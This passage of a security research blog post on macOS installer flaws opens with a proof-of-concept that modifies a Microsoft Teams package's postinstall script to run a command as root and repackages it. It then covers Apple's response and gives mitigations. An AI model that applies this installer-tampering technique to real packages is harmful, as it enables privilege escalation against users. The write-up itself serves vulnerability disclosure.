echo “#!/usr/bin/env sh\nid > ~/Downloads/exploit\n$(cat ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak)” > ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm -f ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
chmod +x ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
# Repackage and rename the installer as expected
pkgutil -f --flatten ~/Downloads/extract ~/Downloads/Teams_osx.pkg

When a user runs this newly created package, it will operate exactly as expected from the perspective of the end-user. Post-installation, however, we can see that the postinstall script run during installation has created a new file at ~/Downloads/exploit that contains the output of the id command as run by the root user, demonstrating successful privilege escalation.

Demo of above proof of concept

When we reported the above to Apple, this was the response we received:

Based on the steps provided, it appears you are reporting Gatekeeper does not apply to a package created locally. This is expected behavior.

We confirmed that this is indeed what we were reporting and requested additional information based on the Gatekeeper documentation available:

Apple explained that their initial explanation was faulty, but maintained that Gatekeeper acted as expected in the provided scenario.

Essentially, they state that locally created packages are not checked for malicious content by Gatekeeper nor are they required to be signed. This means that even packages that require root privileges to run can be copied, modified, and recreated locally in order to bypass security mechanisms. This allows an attacker with local access to man-in-the-middle package downloads and escalates privileges to root when a package that does so is executed.

Conclusion and Mitigations

So, are these flaws actually a big deal? From a realistic risk standpoint, no, not really. This is just another tool in an already stuffed post-exploitation toolbox, though, it should be noted that similar installer-based attack vectors are actively being exploited, as is the case in recent SolarWinds news.

From a triage standpoint, however, this is absolutely a big deal for a couple of reasons:

  1. Apple has put so much effort over the last few iterations of macOS into baseline security measures that it seems counterproductive to their development goals to ignore basic issues such as these (especially issues they’ve already implemented similar fixes for).
  2. It demonstrates how much emphasis some vendors place on making issues go away rather than solving them.

We understand that vulnerability triage teams are absolutely bombarded with half-baked vulnerability reports, but becoming unresponsive during the disclosure response, overusing canned messaging, or simply giving incorrect reasons should not be the norm and highlights many of the frustrations researchers experience when interacting with these larger organizations.

We want to point out that we do not blame any single organization or individual here and acknowledge that there may be bigger things going on behind the scenes that we are not privy to. It’s also totally possible that our reports or explanations were hot garbage and our points were not clearly made. In either case, though, communications from the vendors should have been better about what information was needed to clarify the issues before they were simply discarded.

Circling back to the issues at hand, what can users do to protect themselves? It’s impractical for everyone to manually audit each and every installer they interact with. The occasional spot check with Suspicious Package, which shows all scripts executed when an installer package is run, never hurts. In general, though, paying attention to proper code signatures (look for the lock in the upper righthand corner of the installer) goes a long way.

For developers, pay special attention to the directories and files being used during the installation process when creating distribution packages. In general, it’s best practice to use an installer sandbox whenever possible. When that isn’t possible, verifying the integrity of files as well as enforcing proper permissions on the directories and files being operated on is enough to mitigate these issues.

Further details on these discoveries can be found in TRA-2021–19, TRA-2021–20, and TRA-2021–21.


More macOS Installer Flaws was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

❌
❌